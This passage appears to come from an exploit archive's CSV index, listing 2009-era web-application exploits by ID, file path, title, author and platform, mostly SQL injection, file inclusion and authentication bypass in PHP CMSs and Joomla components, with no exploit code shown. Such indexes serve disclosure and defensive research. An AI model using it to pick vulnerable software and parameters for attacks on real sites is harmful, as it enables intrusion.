+9369,exploits/php/webapps/9369.txt,"Irokez CMS 0.7.1 - SQL Injection",2009-08-05,Ins3t,webapps,php, +9370,exploits/php/webapps/9370.txt,"AccessoriesMe PHP Affiliate Script 1.4 - Blind SQL Injection / Cross-Site Scripting",2009-08-05,Moudi,webapps,php, +9371,exploits/php/webapps/9371.txt,"opennews 1.0 - SQL Injection / Remote Code Execution",2009-08-05,SirGod,webapps,php, +9372,exploits/php/webapps/9372.txt,"Portel 2008 - 'decide.php?patron' Blind SQL Injection",2009-08-05,"Chip d3 bi0s",webapps,php, +9378,exploits/php/webapps/9378.txt,"PHP Script Forum Hoster - Topic Delete / Cross-Site Scripting",2009-08-06,int_main();,webapps,php, +9380,exploits/php/webapps/9380.txt,"TYPO3 CMS 4.0 - 'showUid' SQL Injection",2009-08-06,Ro0T-MaFia,webapps,php, +9383,exploits/php/webapps/9383.txt,"LM Starmail 2.0 - SQL Injection / File Inclusion",2009-08-06,int_main();,webapps,php, +9384,exploits/php/webapps/9384.txt,"Alwasel 1.5 - Multiple SQL Injections",2009-08-07,SwEET-DeViL,webapps,php, +9385,exploits/php/webapps/9385.txt,"PHotoLa Gallery 1.0 - Authentication Bypass",2009-08-07,Red-D3v1L,webapps,php, +9387,exploits/php/webapps/9387.txt,"Banner Exchange Script 1.0 - 'targetid' Blind SQL Injection",2009-08-07,"599eme Man",webapps,php, +9389,exploits/php/webapps/9389.txt,"Logoshows BBS 2.0 - 'forumid' SQL Injection",2009-08-07,Ruzgarin_Oglu,webapps,php, +9390,exploits/php/webapps/9390.txt,"Typing Pal 1.0 - 'idTableProduit' SQL Injection",2009-08-07,Red-D3v1L,webapps,php, +9394,exploits/php/webapps/9394.pl,"Arab Portal 2.2 - Blind Cookie Authentication Bypass",2009-08-07,"Jafer Al Zidjali",webapps,php, +9395,exploits/php/webapps/9395.txt,"PHPCityPortal - Authentication Bypass",2009-08-07,CoBRa_21,webapps,php, +9396,exploits/php/webapps/9396.txt,"Facil Helpdesk - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-08-07,Moudi,webapps,php, +9397,exploits/php/webapps/9397.txt,"IsolSoft Support Center 2.5 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-08-07,Moudi,webapps,php, +9398,exploits/php/webapps/9398.php,"Joomla! Component com_pms 2.0.4 - 'Ignore-List' SQL Injection",2009-08-07,M4dhead,webapps,php, +9399,exploits/php/webapps/9399.txt,"Logoshows BBS 2.0 - Authentication Bypass",2009-08-07,Dns-Team,webapps,php, +9400,exploits/php/webapps/9400.txt,"logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling",2009-08-07,ZoRLu,webapps,php, +9404,exploits/php/webapps/9404.txt,"SmilieScript 1.0 - Authentication Bypass",2009-08-10,Mr.tro0oqy,webapps,php, +9405,exploits/php/webapps/9405.txt,"Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution",2009-08-10,"RedTeam Pentesting",webapps,php, +9406,exploits/php/webapps/9406.txt,"Mini-CMS 1.0.1 - 'page.php' SQL Injection",2009-08-10,Ins3t,webapps,php, +9407,exploits/php/webapps/9407.txt,"CMS Made Simple 1.6.2 - Local File Disclosure",2009-08-10,IHTeam,webapps,php, +9408,exploits/php/webapps/9408.php,"Joomla! Component Kunena Forums (com_kunena) - Blind SQL Injection",2009-08-10,"ilker Kandemir",webapps,php, +9410,exploits/php/webapps/9410.txt,"WordPress 2.8.3 - Remote Admin Reset Password",2009-08-11,"laurent gaffié",webapps,php, +9413,exploits/php/webapps/9413.txt,"Joomla! Component idoblog 1.1b30 (com_idoblog) - SQL Injection",2009-08-11,kkr,webapps,php, +9416,exploits/php/webapps/9416.txt,"OCS Inventory NG 1.2.1 - 'systemid' SQL Injection",2009-08-11,"Guilherme Marinheiro",webapps,php, +9419,exploits/php/webapps/9419.txt,"Shorty 0.7.1b - (Authentication Bypass) Insecure Cookie Handling",2009-08-12,"Pedro Laguna",webapps,php, +9421,exploits/php/webapps/9421.txt,"Gallarific 1.1 - '/gallery.php' Arbitrary Delete/Edit Category",2009-08-12,"ilker Kandemir",webapps,php, +9424,exploits/php/webapps/9424.txt,"Plume CMS 1.2.3 - Multiple SQL Injections",2009-08-12,"Sense of Security",webapps,php, +9425,exploits/php/webapps/9425.sh,"Gazelle CMS 1.0 - Multiple Vulnerabilities / Remote Code Execution",2009-08-12,IHTeam,webapps,php, +9430,exploits/php/webapps/9430.pl,"JBLOG 1.5.1 - SQL Table Backup",2009-08-13,Ams,webapps,php, +9431,exploits/php/webapps/9431.txt,"WordPress Plugin WP-Syntax 0.9.1 - Remote Command Execution",2009-08-27,Raz0r,webapps,php, +9433,exploits/php/webapps/9433.txt,"Gazelle CMS 1.0 - Arbitrary File Upload",2009-08-13,RoMaNcYxHaCkEr,webapps,php, +9434,exploits/php/webapps/9434.txt,"tgs CMS 0.x - Cross-Site Scripting / SQL Injection / File Disclosure",2009-08-13,[]ViZiOn,webapps,php, +9437,exploits/php/webapps/9437.txt,"Ignition 1.2 - 'comment' Remote Code Injection",2009-08-14,"Khashayar Fereidani",webapps,php, +9438,exploits/php/webapps/9438.txt,"PHP Competition System 0.84 - 'competition' SQL Injection",2009-08-14,Mr.SQL,webapps,php, +9440,exploits/php/webapps/9440.txt,"DS CMS 1.0 - 'nFileId' SQL Injection",2009-08-14,Mr.tro0oqy,webapps,php, +9441,exploits/php/webapps/9441.txt,"MyWeight 1.0 - Arbitrary File Upload",2009-08-14,Mr.tro0oqy,webapps,php, +9444,exploits/php/webapps/9444.txt,"PHP-Lance 1.52 - Multiple Local File Inclusions",2009-08-18,jetli007,webapps,php, +9445,exploits/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",webapps,php, +9447,exploits/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - 'id' SQL Injection",2009-08-18,NoGe,webapps,php, +9448,exploits/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to '.XML' File",2009-08-18,Kernel_Panik,webapps,php, +9450,exploits/php/webapps/9450.txt,"vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,webapps,php, +9451,exploits/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' SQL Injection",2009-08-18,Mr.SQL,webapps,php, +9452,exploits/php/webapps/9452.pl,"Arcadem Pro 2.8 - 'article' Blind SQL Injection",2009-08-18,Mr.SQL,webapps,php, +9453,exploits/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - 'UploadID' SQL Injection",2009-08-18,Mr.SQL,webapps,php, +9459,exploits/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,webapps,php, +9460,exploits/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,webapps,php, +9461,exploits/php/webapps/9461.txt,"E CMS 1.0 - 'index.php?s' SQL Injection",2009-08-18,Red-D3v1L,webapps,php, +9462,exploits/php/webapps/9462.txt,"Infinity 2.x.x - options[style_dir] Local File Disclosure",2009-08-18,SwEET-DeViL,webapps,php, +9463,exploits/php/webapps/9463.php,"Joomla! Component MisterEstate - Blind SQL Injection",2009-08-18,jdc,webapps,php, +9464,exploits/php/webapps/9464.txt,"Fotoshow PRO - 'category' SQL Injection",2009-08-18,darkmasking,webapps,php, +9465,exploits/php/webapps/9465.txt,"phpfreeBB 1.0 - Blind SQL Injection",2009-08-18,Moudi,webapps,php, +9469,exploits/php/webapps/9469.txt,"Ultimate Fade-in Slideshow 1.51 - Arbitrary File Upload",2009-08-18,"NeX HaCkEr",webapps,php, +9470,exploits/php/webapps/9470.txt,"PHP Email Manager - 'remove.php?ID' SQL Injection",2009-08-18,MuShTaQ,webapps,php, +9471,exploits/php/webapps/9471.txt,"CBAuthority - ClickBank Affiliate Management SQL Injection",2009-08-18,"Angela Chang",webapps,php, +9472,exploits/php/webapps/9472.txt,"Best Dating Script - Arbitrary File Upload",2009-08-18,jetli007,webapps,php, +9474,exploits/php/webapps/9474.rb,"Traidnt UP 2.0 - SQL Injection",2009-08-18,"Jafer Al Zidjali",webapps,php, +9475,exploits/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup",2009-08-18,alnjm33,webapps,php, +9481,exploits/php/webapps/9481.txt,"Moa Gallery 1.1.0 - 'gallery_id' SQL Injection",2009-08-24,Mr.tro0oqy,webapps,php, +9482,exploits/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Authentication Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,webapps,php, +9484,exploits/php/webapps/9484.txt,"PHP Dir Submit - 'aid' SQL Injection",2009-08-24,Mr.tro0oqy,webapps,php, +9485,exploits/php/webapps/9485.txt,"Cuteflow 2.10.3 - 'edituser.php' Security Bypass",2009-08-24,"Hever Costa Rocha",webapps,php, +9490,exploits/php/webapps/9490.txt,"Lanai Core 0.6 - Remote File Disclosure / Info Disclosure",2009-08-24,"Khashayar Fereidani",webapps,php, +9491,exploits/php/webapps/9491.txt,"Dow Group - 'new.php' SQL Injection",2009-11-16,ProF.Code,webapps,php, +9493,exploits/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure",2009-08-24,Septemb0x,webapps,php, +9494,exploits/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,webapps,php, +9497,exploits/php/webapps/9497.pl,"ITechBids 8.0 - 'ProductID' Blind SQL Injection",2009-08-24,Mr.SQL,webapps,php, +9499,exploits/php/webapps/9499.txt,"New5starRating 1.0 - 'rating.php' SQL Injection",2009-08-24,Bgh7,webapps,php, +9502,exploits/php/webapps/9502.txt,"Joomla! Component com_ninjamonial 1.1 - 'testimID' SQL Injection",2009-08-24,"Chip d3 bi0s",webapps,php, +9504,exploits/php/webapps/9504.txt,"Joomla! Component com_jtips 1.0.x - 'season' Blind SQL Injection",2009-08-24,"Chip d3 bi0s",webapps,php, +9505,exploits/php/webapps/9505.txt,"Geeklog 1.6.0sr1 - Arbitrary File Upload",2009-08-24,JaL0h,webapps,php, +9510,exploits/php/webapps/9510.txt,"Joomla! Component com_siirler 1.2 - 'sid' SQL Injection",2009-08-25,v3n0m,webapps,php, +9511,exploits/php/webapps/9511.txt,"Turnkey Arcade Script - SQL Injection (2)",2009-08-25,Red-D3v1L,webapps,php, +9512,exploits/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass",2009-08-25,Securitylab.ir,webapps,php, +40383,exploits/asp/webapps/40383.txt,"Cisco EPC 3925 - Multiple Vulnerabilities",2016-09-15,"Patryk Bogdan",webapps,asp,80 +9518,exploits/php/webapps/9518.txt,"EMO Breader Manager - 'video.php?movie' SQL Injection",2009-08-25,Mr.SQL,webapps,php, +9522,exploits/php/webapps/9522.txt,"Moa Gallery 1.2.0 - Multiple Remote File Inclusions",2009-08-26,cr4wl3r,webapps,php, +9523,exploits/php/webapps/9523.txt,"Moa Gallery 1.2.0 - 'index.php?action' SQL Injection",2009-08-26,Mr.SQL,webapps,php, +9524,exploits/php/webapps/9524.txt,"totalcalendar 2.4 - Blind SQL Injection / Local File Inclusion",2009-08-26,Moudi,webapps,php, +9525,exploits/php/webapps/9525.txt,"Moa Gallery 1.2.0 - 'p_filename' Remote File Disclosure",2009-08-26,GoLd_M,webapps,php, +9527,exploits/php/webapps/9527.txt,"Simple CMS Framework 1.0 - 'page' SQL Injection",2009-08-26,Red-D3v1L,webapps,php, +9529,exploits/php/webapps/9529.txt,"Discuz! Plugin Crazy Star 2.0 - 'fmid' SQL Injection",2009-08-26,ZhaoHuAn,webapps,php, +9530,exploits/php/webapps/9530.txt,"Open Auto Classifieds 1.5.9 - Multiple Vulnerabilities",2009-08-26,"Andrew Horton",webapps,php, +9531,exploits/php/webapps/9531.txt,"PAD Site Scripts 3.6 - 'list.php?string' SQL Injection",2009-08-26,Mr.SQL,webapps,php, +9532,exploits/php/webapps/9532.txt,"allomani 2007 - 'cat' SQL Injection",2009-08-26,"NeX HaCkEr",webapps,php, +9533,exploits/php/webapps/9533.txt,"PHPSANE 0.5.0 - 'save.php' Remote File Inclusion",2009-08-26,CoBRa_21,webapps,php, +9534,exploits/php/webapps/9534.txt,"Joomla! Component com_digifolio 1.52 - 'id' SQL Injection",2009-08-27,v3n0m,webapps,php, +9535,exploits/php/webapps/9535.txt,"Uiga Church Portal - 'year' SQL Injection",2009-08-27,Mr.SQL,webapps,php, +9538,exploits/php/webapps/9538.txt,"Silurus Classifieds System - 'category.php' SQL Injection",2009-08-28,Mr.SQL,webapps,php, +9544,exploits/php/webapps/9544.txt,"Modern Script 5.0 - 'index.php?s' SQL Injection",2009-08-31,Red-D3v1L,webapps,php, +9552,exploits/php/webapps/9552.txt,"Re-Script 0.99 Beta - 'listings.php?op' SQL Injection",2009-08-31,Mr.SQL,webapps,php, +9553,exploits/php/webapps/9553.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injections (1)",2009-08-31,Affix,webapps,php, +9555,exploits/php/webapps/9555.txt,"Mybuxscript PTC-BUX - 'spnews.php' SQL Injection",2009-08-31,HxH,webapps,php, +9556,exploits/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a - Code Execution",2009-08-31,flyh4t,webapps,php, +9562,exploits/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure",2009-09-01,"SEC Consult",webapps,asp, +9563,exploits/php/webapps/9563.txt,"Joomla! Component com_artportal 1.0 - 'portalid' SQL Injection",2009-09-01,"599eme Man",webapps,php, +9564,exploits/php/webapps/9564.txt,"Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion",2009-09-01,ByALBAYX,webapps,php, +9565,exploits/php/webapps/9565.txt,"Xstate Real Estate 1.0 - Blind SQL Injection / Cross-Site Scripting",2009-09-01,Moudi,webapps,php, +9566,exploits/php/webapps/9566.txt,"KingCMS 0.6.0 - 'menu.php' Remote File Inclusion",2009-09-01,CoBRa_21,webapps,php, +9569,exploits/php/webapps/9569.txt,"phpBB3 - addon prime_quick_style GetAdmin",2009-09-01,-SmoG-,webapps,php, +9570,exploits/php/webapps/9570.txt,"Ve-EDIT 0.1.4 - 'debug_PHP.php' Local File Inclusion",2009-09-01,CoBRa_21,webapps,php, +9571,exploits/php/webapps/9571.txt,"Joomla! Component com_gameserver 1.0 - 'id' SQL Injection",2009-09-01,v3n0m,webapps,php, +9572,exploits/php/webapps/9572.txt,"DataLife Engine 8.2 - dle_config_api Remote File Inclusion",2009-09-01,Kurd-Team,webapps,php, +9576,exploits/php/webapps/9576.txt,"Discuz! Plugin JiangHu 1.1 - 'id' SQL Injection",2009-09-02,ZhaoHuAn,webapps,php, +9577,exploits/php/webapps/9577.txt,"Ve-EDIT 0.1.4 - 'highlighter' Remote File Inclusion",2009-09-02,RoMaNcYxHaCkEr,webapps,php, +9578,exploits/php/webapps/9578.txt,"PHP Live! 3.3 - 'deptid' SQL Injection",2009-09-02,v3n0m,webapps,php, +9582,exploits/php/webapps/9582.txt,"FreeSchool 1.1.0 - Multiple Remote File Inclusions",2009-09-03,cr4wl3r,webapps,php, +9583,exploits/php/webapps/9583.txt,"PHPope 1.0.0 - Multiple Remote File Inclusions",2009-09-03,cr4wl3r,webapps,php, +9588,exploits/php/webapps/9588.txt,"Mambo Component com_zoom - 'catid' Blind SQL Injection",2009-09-04,boom3rang,webapps,php, +9590,exploits/php/webapps/9590.c,"ZeroBoard 4.1 pl7 - 'now_connect()' Remote Code Execution",2009-09-04,SpeeDr00t,webapps,php, +9591,exploits/php/webapps/9591.txt,"Ticket Support Script - 'ticket.php' Arbitrary File Upload",2009-09-04,InjEctOr5,webapps,php, +9593,exploits/php/webapps/9593.txt,"Joomla! Component com_Joomlaub - 'aid' SQL Injection",2009-09-04,"599eme Man",webapps,php, +9599,exploits/php/webapps/9599.txt,"The Rat CMS Alpha 2 - Arbitrary File Upload",2009-09-09,Securitylab.ir,webapps,php, +9600,exploits/php/webapps/9600.txt,"OBOphiX 2.7.0 - 'fonctions_racine.php' Remote File Inclusion",2009-09-09,"EA Ngel",webapps,php, +9601,exploits/php/webapps/9601.php,"Joomla! Component BF Survey Pro Free - SQL Injection",2009-09-09,jdc,webapps,php, +9602,exploits/php/webapps/9602.pl,"Joomla! Component TPDugg 1.1 - Blind SQL Injection",2009-09-09,NoGe,webapps,php, +9603,exploits/php/webapps/9603.txt,"Model Agency Manager Pro - 'user_id' SQL Injection",2009-09-09,R3d-D3V!L,webapps,php, +9604,exploits/php/webapps/9604.txt,"Joomla! Component Joomloc 1.0 - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",webapps,php, +9605,exploits/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,webapps,php, +9609,exploits/php/webapps/9609.txt,"Mambo Component Hestar - SQL Injection",2009-09-09,M3NW5,webapps,php, +9611,exploits/php/webapps/9611.txt,"PHPNagios 1.2.0 - 'menu.php' Local File Inclusion",2009-09-09,CoBRa_21,webapps,php, +9612,exploits/asp/webapps/9612.txt,"ChartDirector 5.0.1 - 'cacheId' Arbitrary File Disclosure",2009-09-09,DokFLeed,webapps,asp, +9623,exploits/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusions",2009-09-10,Kurd-Team,webapps,php, +9625,exploits/php/webapps/9625.txt,"nullam blog 0.1.2 - Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting",2009-09-10,"Salvatore Fresta",webapps,php, +9629,exploits/php/webapps/9629.txt,"Graffiti CMS 1.x - Arbitrary File Upload",2009-09-10,"Alexander Concha",webapps,php, +9630,exploits/php/webapps/9630.txt,"MYRE Holiday Rental Manager - 'action' SQL Injection",2009-09-10,Mr.SQL,webapps,php, +9631,exploits/php/webapps/9631.txt,"iDesk - 'download.php?cat_id' SQL Injection",2009-09-10,Mr.SQL,webapps,php, +9632,exploits/php/webapps/9632.txt,"Accommodation Hotel Booking Portal - 'hotel_id' SQL Injection",2009-09-10,Mr.SQL,webapps,php, +9633,exploits/php/webapps/9633.txt,"Bus Script - 'sitetext_id' SQL Injection",2009-09-10,Mr.SQL,webapps,php, +9634,exploits/php/webapps/9634.txt,"Adult Portal escort listing - 'user_id' SQL Injection",2009-09-10,Mr.SQL,webapps,php, +9635,exploits/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - 'admin_news_bot.php' Remote File Inclusion",2009-09-10,"EA Ngel",webapps,php, +9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",webapps,php, +9637,exploits/php/webapps/9637.txt,"T-HTB Manager 0.5 - Multiple Blind SQL Injections",2009-09-10,"Salvatore Fresta",webapps,php, +9639,exploits/php/webapps/9639.txt,"Image voting 1.0 - 'index.php?show' SQL Injection",2009-09-11,SkuLL-HackeR,webapps,php, +9640,exploits/php/webapps/9640.txt,"gyro 5.0 - SQL Injection / Cross-Site Scripting",2009-09-11,OoN_Boy,webapps,php, +9647,exploits/php/webapps/9647.txt,"PHP-IPNMonitor - 'maincat_id' SQL Injection",2009-09-11,noname,webapps,php, +9648,exploits/php/webapps/9648.txt,"Joomla! Component Hotel Booking System - Cross-Site Scripting / SQL Injection",2009-09-11,K-159,webapps,php, +9653,exploits/php/webapps/9653.txt,"Joomla! Component Turtushout 0.11 - 'Name' SQL Injection",2009-09-14,jdc,webapps,php, +9654,exploits/php/webapps/9654.php,"Joomla! Component AlphaUserPoints - SQL Injection",2009-09-14,jdc,webapps,php, +9656,exploits/php/webapps/9656.txt,"Aurora CMS 1.0.2 - 'install.plugin.php' Remote File Inclusion",2009-09-14,"EA Ngel",webapps,php, +9665,exploits/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,webapps,php, +9669,exploits/php/webapps/9669.txt,"Bs Counter 2.5.3 - 'page' SQL Injection",2009-09-14,Bgh7,webapps,php, +9674,exploits/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - Authentication Bypass",2009-09-15,snakespc,webapps,php, +9675,exploits/asp/webapps/9675.txt,"HotWeb Rentals - 'details.asp?PropId' Blind SQL Injection",2009-09-15,R3d-D3V!L,webapps,asp, +9681,exploits/php/webapps/9681.txt,"efront 3.5.4 - 'database.php?path' Remote File Inclusion",2009-09-15,cr4wl3r,webapps,php, +9692,exploits/php/webapps/9692.txt,"iBoutique.MALL 1.2 - 'cat' Blind SQL Injection",2009-09-15,InjEctOr5,webapps,php, +9693,exploits/php/webapps/9693.txt,"Joomla! Component com_djcatalog - SQL Injection / Blind SQL Injection",2009-09-15,"Chip d3 bi0s",webapps,php, +9696,exploits/php/webapps/9696.txt,"AdsDX 3.05 - Authentication Bypass",2009-09-16,snakespc,webapps,php, +9697,exploits/php/webapps/9697.txt,"Joomla! Component com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection",2009-09-16,"Chip d3 bi0s",webapps,php, +9698,exploits/php/webapps/9698.pl,"Joomla! Component com_jlord_rss - 'id' Blind SQL Injection",2009-09-16,"Chip d3 bi0s",webapps,php, +9699,exploits/php/webapps/9699.txt,"Micro CMS 3.5 - SQL Injection / Local File Inclusion",2009-09-16,"learn3r hacker",webapps,php, +9700,exploits/php/webapps/9700.rb,"SaphpLesson 4.3 - Blind SQL Injection",2009-09-16,"Jafer Al Zidjali",webapps,php, +9702,exploits/php/webapps/9702.txt,"Elite Gaming Ladders 3.2 - 'platform' SQL Injection",2009-09-16,snakespc,webapps,php, +9703,exploits/php/webapps/9703.txt,"phpPollScript 1.3 - 'include_class' Remote File Inclusion",2009-09-16,cr4wl3r,webapps,php, +9706,exploits/php/webapps/9706.txt,"Joomla! Component com_album 1.14 - Directory Traversal",2009-09-17,DreamTurk,webapps,php, +9708,exploits/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - 'pageHeader.php?path' Remote File Inclusion",2009-09-17,"EA Ngel",webapps,php, +9710,exploits/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' SQL Injection",2009-09-17,"learn3r hacker",webapps,php, +9711,exploits/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injections",2009-09-17,"learn3r hacker",webapps,php, +9712,exploits/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - Authentication Bypass",2009-09-17,"learn3r hacker",webapps,php, +9713,exploits/php/webapps/9713.pl,"Joomla! Component com_jreservation 1.5 - 'pid' Blind SQL Injection",2009-09-17,"Chip d3 bi0s",webapps,php, +9714,exploits/multiple/webapps/9714.txt,"Mambo Component com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",webapps,multiple, +9715,exploits/multiple/webapps/9715.txt,"Zainu 1.0 - SQL Injection",2009-09-18,snakespc,webapps,multiple, +9716,exploits/multiple/webapps/9716.txt,"Network Management/Inventory System - 'header.php' Remote File Inclusion",2009-09-18,"EA Ngel",webapps,multiple, +9719,exploits/multiple/webapps/9719.txt,"FanUpdate 2.2.1 - 'show-cat.php' SQL Injection",2009-09-18,"(In)Security Romania",webapps,multiple, +9720,exploits/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusions",2009-09-18,NoGe,webapps,multiple, +9721,exploits/multiple/webapps/9721.txt,"Joomla! Component com_surveymanager 1.5.0 - 'stype' SQL Injection",2009-09-21,kaMtiEz,webapps,multiple, +9722,exploits/multiple/webapps/9722.txt,"DDL CMS 1.0 - Multiple Remote File Inclusions",2009-09-21,HxH,webapps,multiple, +9723,exploits/multiple/webapps/9723.txt,"Joomla! Component com_jbudgetsmagic 0.3.2 < 0.4.0 - 'bid' SQL Injection",2009-09-21,kaMtiEz,webapps,multiple, +9724,exploits/multiple/webapps/9724.txt,"BAnner ROtation System mini - Multiple Remote File Inclusions",2009-09-21,"EA Ngel",webapps,multiple, +9726,exploits/multiple/webapps/9726.py,"cP Creator 2.7.1 - SQL Injection",2009-09-21,"Sina Yazdanmehr",webapps,multiple, +9727,exploits/multiple/webapps/9727.txt,"CMScontrol (Content Management Portal Solutions) - SQL Injection",2009-09-21,ph1l1ster,webapps,multiple, +9728,exploits/multiple/webapps/9728.txt,"ProdLer 2.0 - Remote File Inclusion",2009-09-21,cr4wl3r,webapps,multiple, +9729,exploits/multiple/webapps/9729.txt,"Loggix Project 9.4.5 - Multiple Remote File Inclusions",2009-09-21,cr4wl3r,webapps,multiple, +9730,exploits/multiple/webapps/9730.txt,"WX Guestbook 1.1.208 - SQL Injection / Persistent Cross-Site Scripting",2009-09-21,learn3r,webapps,multiple, +9732,exploits/multiple/webapps/9732.txt,"Joomla! Component com_jinc 0.2 - 'newsid' Blind SQL Injection",2009-09-21,"Chip d3 bi0s",webapps,multiple, +9733,exploits/multiple/webapps/9733.pl,"Joomla! Component com_mytube (user_id) 1.0 Beta - Blind SQL Injection",2009-09-21,"Chip d3 bi0s",webapps,multiple, +9801,exploits/php/webapps/9801.txt,"Flatpress 0.804 < 0.812.1 - Local File Inclusion",2009-09-29,"Giuseppe Fuggiano",webapps,php, +9809,exploits/asp/webapps/9809.txt,"HEAT Call Logging 8.01 - SQL Injection",2009-09-28,"0 0",webapps,asp, +9812,exploits/php/webapps/9812.txt,"Joomla! Component IRCm Basic - SQL Injection",2009-09-28,kaMtiEz,webapps,php, +9818,exploits/php/webapps/9818.txt,"Klonet E-Commerce - 'products.php' SQL Injection",2009-09-25,S3T4N,webapps,php, +9819,exploits/multiple/webapps/9819.txt,"Engeman 6.x - SQL Injection",2009-09-25,crashbrz,webapps,multiple, +9820,exploits/php/webapps/9820.txt,"Regental Medien - Blind SQL Injection",2009-09-24,NoGe,webapps,php, +9821,exploits/php/webapps/9821.txt,"FSphp 0.2.1 - Remote File Inclusion",2009-09-24,NoGe,webapps,php, +9822,exploits/php/webapps/9822.txt,"Joomla! Component Fastball 1.1.0 < 1.2 - SQL Injection",2009-09-24,kaMtiEz,webapps,php, +9824,exploits/php/webapps/9824.txt,"Swiss Mango CMS - SQL Injection",2009-09-24,kaMtiEz,webapps,php, +9825,exploits/php/webapps/9825.txt,"e107 0.7.16 - Referer header Cross-Site Scripting",2009-09-24,MustLive,webapps,php, +9826,exploits/php/webapps/9826.txt,"MindSculpt CMS - SQL Injection",2009-09-24,kaMitEz,webapps,php, +9828,exploits/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection / Cross-Site Scripting",2009-09-23,"Alexey Sintsov",webapps,php, +9830,exploits/php/webapps/9830.txt,"Cour Supreme - SQL Injection",2009-09-23,"CrAzY CrAcKeR",webapps,php, +9832,exploits/php/webapps/9832.txt,"Joomla! / Mambo Component Tupinambis - SQL Injection",2009-09-22,"Don Tukulesto",webapps,php, +9833,exploits/php/webapps/9833.txt,"Joomla! Component com_facebook - SQL Injection",2009-09-22,kaMtiEz,webapps,php, +9834,exploits/asp/webapps/9834.txt,"BPLawyerCaseDocuments - SQL Injection",2009-09-22,"OoN Boy",webapps,asp, +9835,exploits/php/webapps/9835.txt,"HB CMS 1.7 - SQL Injection",2009-09-22,"Securitylab Security Research",webapps,php, +9836,exploits/php/webapps/9836.txt,"BPMusic 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",webapps,php, +9837,exploits/php/webapps/9837.txt,"BPStudent 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",webapps,php, +9838,exploits/php/webapps/9838.pl,"BPGames 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",webapps,php, +9839,exploits/php/webapps/9839.txt,"Achievo 1.3.4 - Remote File Inclusion",2009-09-22,M3NW5,webapps,php, +9840,exploits/php/webapps/9840.txt,"Joomla! Component GroupJive 1.8 B4 - Remote File Inclusion",2009-09-22,M3NW5,webapps,php, +9841,exploits/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",webapps,asp, +9847,exploits/php/webapps/9847.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (1)",2009-11-04,Abysssec,webapps,php, +9849,exploits/php/webapps/9849.php,"PunBB Extension Attachment 1.0.2 - SQL Injection",2009-11-03,puret_t,webapps,php, +9850,exploits/php/webapps/9850.txt,"Xerox Fiery Webtools - SQL Injection",2009-11-03,"Bernardo Trigo",webapps,php, +9854,exploits/php/webapps/9854.txt,"TFTgallery .13 - Directory Traversal",2009-11-02,blake,webapps,php, +9855,exploits/php/webapps/9855.txt,"Geeklog 1.6.0sr2 - Arbitrary File Upload",2009-10-03,JaL0h,webapps,php, +9856,exploits/asp/webapps/9856.txt,"Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,"Andrea Fabrizi",webapps,asp, +9857,exploits/asp/webapps/9857.txt,"AfterLogic WebMail Pro 4.7.10 - Cross-Site Scripting",2009-10-05,"Sébastien Duquette",webapps,asp, +9861,exploits/unix/webapps/9861.rb,"Nagios3 - 'statuswml.cgi' Command Injection (Metasploit)",2009-10-30,"H D Moore",webapps,unix, +9863,exploits/php/webapps/9863.txt,"Achievo 1.3.4 - Cross-Site Scripting",2009-10-14,"Ryan Dewhurst",webapps,php, +9867,exploits/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 - Path Disclosure",2009-10-19,"Vladimir Vorontsov",webapps,php, +9872,exploits/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",webapps,multiple, +9873,exploits/windows/webapps/9873.txt,"Cherokee 0.5.4 - Directory Traversal",2009-10-28,Dr_IDE,webapps,windows, +9875,exploits/php/webapps/9875.txt,"CubeCart 4 - Session Management Bypass",2009-10-30,"Bogdan 